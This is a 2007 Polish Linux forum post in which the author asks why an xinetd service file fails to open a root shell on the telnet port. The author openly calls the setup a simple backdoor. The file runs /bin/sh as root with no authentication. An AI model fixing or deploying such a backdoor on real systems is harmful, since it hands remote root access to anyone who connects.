Forum Linux.pl
System => Sieć => Wątek zaczęty przez: gamcoder w 2007-11-06, 20:34:05
-
Witam
Ostatnimi czasy eksperymentuję sobię z xinetd i wszystko szło pięknie dopóki nie postanowiłem uruchomić na porcie np. telnetu powłoki, tzn. tak, aby po połączeniu się z tym portem otwierała się powłoka z prawami roota(taki backdoor prosty)
To jest kod odpowiedniego pliku w xinetd.d:
service telnet
{
flags = NAMEINARGS
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/sbin/tcpd
server_args = /bin/sh
disable = no
}
Według moich załóżeń miał on powodować to, że po telnetowaniu się na 23 port otrzymuje się powłokę z prawami admina. Niestety po połączeniu pisze:
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
I można pisać byle co, i tak nic się nie wykonuje. Tak jakby nie uruchamiał /bin/sh, a on jest w tym katalogu.
Co zrobić?